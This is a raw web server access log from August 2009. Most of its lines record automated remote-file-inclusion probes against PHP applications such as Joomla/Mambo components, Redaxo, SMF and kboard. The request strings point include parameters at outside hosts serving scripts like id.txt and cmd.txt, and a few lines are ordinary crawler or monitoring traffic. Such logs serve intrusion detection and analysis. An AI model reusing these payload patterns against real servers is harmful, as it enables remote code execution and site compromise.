220.123.239.163 - - [12/Aug/2009:00:39:36 -0400] "GET /logs/access_log.Q109070400%20%20//trans/trans.php?trans=en&page=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:00:39:41 -0400] "GET /logs/access_log.Q109070200%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
195.209.236.77 - - [12/Aug/2009:00:39:41 -0400] "GET /logs/access_log.Q109051400%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
202.191.43.177 - - [12/Aug/2009:00:39:43 -0400] "GET /logs/error_log.Q109052700/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.805"
220.123.239.163 - - [12/Aug/2009:00:39:58 -0400] "GET /logs/access_log.Q109060800%20%20//trans/trans.php?trans=en&page=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:00:40:01 -0400] "GET /logs/access_log.Q109052600//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:00:40:01 -0400] "GET /logs//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:00:40:01 -0400] "GET //redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
220.123.239.163 - - [12/Aug/2009:00:40:02 -0400] "GET /logs/access_log.Q109053100//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
77.221.130.22 - - [12/Aug/2009:00:40:10 -0400] "GET /logs/access_log.Q109070200%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
77.221.130.22 - - [12/Aug/2009:00:40:10 -0400] "GET /logs/access_log.Q109051400%20%20/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://www.edu-math.com/upload_question_images/fx29id1.txt? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
74.6.22.125 - - [12/Aug/2009:00:40:54 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.125 - - [12/Aug/2009:00:40:55 -0400] "GET /logs/access_log.Q108091400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.32.40.221 - - [12/Aug/2009:00:41:31 -0400] "GET //redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
114.32.40.221 - - [12/Aug/2009:00:41:31 -0400] "GET /logs//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
114.32.40.221 - - [12/Aug/2009:00:41:31 -0400] "GET /logs/access_log.Q109052600//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:00:41:35 -0400] "GET /logs/access_log.Q109071100/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
114.32.40.221 - - [12/Aug/2009:00:41:36 -0400] "GET /logs/access_log.Q109053100//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:00:41:59 -0400] "GET /logs/access_log.Q109053100/?_SERVER[DOCUMENT_ROOT]=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
83.16.182.130 - - [12/Aug/2009:00:42:18 -0400] "GET /logs/access_log.Q109052100/SSI.php?sourcedir=http://www.networkforgod.net/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
83.16.182.130 - - [12/Aug/2009:00:42:19 -0400] "GET /SSI.php?sourcedir=http://www.networkforgod.net/id.txt? HTTP/1.1" 404 205 "-" "libwww-perl/5.803"
83.16.182.130 - - [12/Aug/2009:00:42:19 -0400] "GET /logs/SSI.php?sourcedir=http://www.networkforgod.net/id.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
209.59.12.99 - - [12/Aug/2009:00:42:22 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.15.55.45 - - [12/Aug/2009:00:43:11 -0400] "GET /logs/access_log.Q109052700/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.803"
211.15.55.45 - - [12/Aug/2009:00:43:12 -0400] "GET /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.803"
211.15.55.45 - - [12/Aug/2009:00:43:14 -0400] "GET /logs/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.803"
83.16.182.130 - - [12/Aug/2009:00:43:20 -0400] "GET /logs/access_log.Q109052100/SSI.php?sourcedir=http://www.networkforgod.net/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
83.16.182.130 - - [12/Aug/2009:00:43:20 -0400] "GET /SSI.php?sourcedir=http://www.networkforgod.net/id.txt? HTTP/1.1" 404 205 "-" "libwww-perl/5.803"
83.16.182.130 - - [12/Aug/2009:00:43:21 -0400] "GET /logs/SSI.php?sourcedir=http://www.networkforgod.net/id.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.803"
83.16.182.130 - - [12/Aug/2009:00:43:38 -0400] "GET /logs/error_log.Q109052100/SSI.php?sourcedir=http://www.networkforgod.net/id.txt? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
220.123.239.163 - - [12/Aug/2009:00:43:47 -0400] "GET /logs/access_log.Q109051200//trans/trans.php?trans=en&page=http://happygage.com//bbs/skin/ggambo7002_gallery/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
213.149.105.8 - - [12/Aug/2009:00:44:12 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
213.149.105.8 - - [12/Aug/2009:00:44:14 -0400] "GET /?sourcedir=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
213.149.105.8 - - [12/Aug/2009:00:44:14 -0400] "GET /logs/?sourcedir=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 200 13344 "-" "libwww-perl/5.805"
213.149.105.8 - - [12/Aug/2009:00:44:39 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.cupcakevendor.com/phpRaid/docs/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
114.32.40.221 - - [12/Aug/2009:00:45:31 -0400] "GET /logs/access_log.Q109052600%20%20//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
114.32.40.221 - - [12/Aug/2009:00:45:33 -0400] "GET /logs/access_log.Q109053100%20%20//redaxo/include//functions.inc.php?REX[INCLUDE_PATH]=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
210.109.108.146 - - [12/Aug/2009:00:45:42 -0400] "GET /logs/access_log.Q109052700/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
210.109.108.146 - - [12/Aug/2009:00:45:43 -0400] "GET /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
210.109.108.146 - - [12/Aug/2009:00:45:44 -0400] "GET /logs/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
70.85.146.66 - - [12/Aug/2009:00:45:48 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:45:48 -0400] "GET /logs/access_log.Q109052600/////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:45:48 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 13352 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:45:48 -0400] "GET /logs/access_log.Q109053100/////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:46:28 -0400] "GET /logs/access_log.Q109052600/////?_SERVER[DOCUMENT_ROOT]=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:46:28 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 200 13352 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:46:28 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:46:29 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:46:29 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 200 13352 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:46:30 -0400] "GET /logs/access_log.Q109052600/////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:46:33 -0400] "GET /logs/access_log.Q109053100/////?_SERVER[DOCUMENT_ROOT]=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:46:34 -0400] "GET /logs/access_log.Q109053100/////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:46:42 -0400] "GET /logs/access_log.Q109070100/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:46:42 -0400] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:46:43 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:46:43 -0400] "GET /logs/access_log.Q109051600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:46:46 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:46:46 -0400] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:46:46 -0400] "GET /logs/access_log.Q109070100%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:46:46 -0400] "GET /logs/access_log.Q109051600%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.223.10.64 - - [12/Aug/2009:00:46:55 -0400] "GET /logs/access_log.Q109050800/index.php?dir=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
98.223.10.64 - - [12/Aug/2009:00:46:55 -0400] "GET /logs/index.php?dir=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
98.223.10.64 - - [12/Aug/2009:00:46:55 -0400] "GET /index.php?dir=http://catedralsoftware.com/servicios/fx29id.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
210.109.108.146 - - [12/Aug/2009:00:47:13 -0400] "GET /modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.spse.com.ar/conexion_db/ec.txt?? HTTP/1.1" 404 252 "-" "libwww-perl/5.79"
209.59.12.99 - - [12/Aug/2009:00:47:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
210.68.243.168 - - [12/Aug/2009:00:47:28 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:47:29 -0400] "GET /logs/access_log.Q109052600%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
70.85.146.66 - - [12/Aug/2009:00:47:29 -0400] "GET /logs/access_log.Q109053100%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:47:36 -0400] "GET /logs/access_log.Q109070100/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:47:36 -0400] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:47:36 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:47:38 -0400] "GET /logs/access_log.Q109051600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:47:51 -0400] "GET /logs/access_log.Q109052600%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:47:56 -0400] "GET /logs/access_log.Q109053100%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.hsm.or.kr/rgboard/data/rhs/idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:47:57 -0400] "GET /logs/access_log.Q109052600%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
91.121.83.177 - - [12/Aug/2009:00:48:01 -0400] "GET /logs/access_log.Q109053100%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.pdtmg.org.br/images/stories/MS/idade1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
114.32.40.221 - - [12/Aug/2009:00:48:30 -0400] "GET /logs/access_log.Q109051600//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://gladvertise.com/advertise//includes/idade1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
83.16.182.130 - - [12/Aug/2009:00:48:32 -0400] "GET /SSI.php?sourcedir=http://www.networkforgod.net/id.txt? HTTP/1.1" 404 205 "-" "libwww-perl/5.803"
216.58.238.85 - - [12/Aug/2009:00:49:26 -0400] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:49:26 -0400] "GET /logs/access_log.Q109070100/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:49:28 -0400] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:49:29 -0400] "GET /logs/access_log.Q109051600/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.15.55.45 - - [12/Aug/2009:00:50:10 -0400] "GET /logs/error_log.Q109052700/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.803"
72.30.81.182 - - [12/Aug/2009:00:50:35 -0400] "GET /logs/access_log.Q109053000 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.89.135 - - [12/Aug/2009:00:51:07 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
91.121.89.135 - - [12/Aug/2009:00:51:07 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://mayainfo.co.cc/cmd.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.805"
216.58.238.85 - - [12/Aug/2009:00:51:40 -0400] "GET /logs/access_log.Q109070100%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.58.238.85 - - [12/Aug/2009:00:51:40 -0400] "GET /logs/access_log.Q109051600%20%20/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.alcaldialossalias.gov.ve/modules/mod_footer/fx29id.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:00:52:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
121.78.116.209 - - [12/Aug/2009:00:53:27 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:53:27 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:53:27 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.219.173.21 - - [12/Aug/2009:00:53:39 -0400] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2734804_rfz9u/id.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
210.219.173.21 - - [12/Aug/2009:00:53:39 -0400] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2734804_rfz9u/id.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
210.219.173.21 - - [12/Aug/2009:00:53:39 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2734804_rfz9u/id.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:53:40 -0400] "GET /logs/access_log.Q109070100/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
210.219.173.21 - - [12/Aug/2009:00:53:46 -0400] "GET /logs/access_log.Q109070100/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hotlinkfiles.com/files/2734804_rfz9u/id.txt? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Aug/2009:00:55:26 -0400] "GET /logs/access_log.Q109052100%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
67.218.116.132 - - [12/Aug/2009:00:55:16 -0400] "GET /logs/access_log.Q109072200 HTTP/1.0" 200 5101774 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
121.78.116.209 - - [12/Aug/2009:00:55:33 -0400] "GET /logs/access_log.Q109070100%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cccsm.org/files/1.txt? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
210.109.108.146 - - [12/Aug/2009:00:56:12 -0400] "GET /logs/error_log.Q109052700/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=http://www.spse.com.ar/conexion_db/ec.txt? HTTP/1.1" 404 278 "-" "libwww-perl/5.79"
67.218.116.164 - - [12/Aug/2009:00:56:36 -0400] "GET /logs/access_log.Q109012900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.59.12.99 - - [12/Aug/2009:00:57:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.218.116.164 - - [12/Aug/2009:05:12:29 -0400] "GET /logs/access_log.Q109031300 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.27.203.107 - - [12/Aug/2009:05:12:29 -0400] "GET /logs/access_log.Q109051700%20%20////administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
89.163.145.207 - - [12/Aug/2009:05:13:03 -0400] "GET /logs/access_log.Q109051000//main.php?sayfa=http://hamid-rahimi.com//cmss/baner.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.27.203.107 - - [12/Aug/2009:05:13:40 -0400] "GET /logs/access_log.Q109053100%20%20////administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Aug/2009:05:14:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.245.138.143 - - [12/Aug/2009:05:14:58 -0400] "GET /logs/access_log.Q109080500////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:05:14:59 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:05:14:59 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 200 13351 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:05:15:37 -0400] "GET //include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:05:15:37 -0400] "GET /logs/error_log.Q109072700//include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
64.27.6.186 - - [12/Aug/2009:05:15:37 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
123.125.66.118 - - [12/Aug/2009:05:15:47 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
64.27.6.186 - - [12/Aug/2009:05:15:57 -0400] "GET /logs/access_log.Q109072700//include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:05:16:00 -0400] "GET //include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:05:16:00 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
128.241.53.238 - - [12/Aug/2009:05:16:00 -0400] "GET /logs/error_log.Q109072700//include/mail.inc.php?skin_board_path=http://tikihub.com/media/video/log/copyright.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
67.218.116.164 - - [12/Aug/2009:05:16:29 -0400] "GET /logs/error_log.Q108091200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
119.245.138.143 - - [12/Aug/2009:05:16:28 -0400] "GET /logs/access_log.Q109080500%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
119.245.138.143 - - [12/Aug/2009:05:16:28 -0400] "GET /logs/access_log.Q109051200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.holytrinityparish.org/calndr_set/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
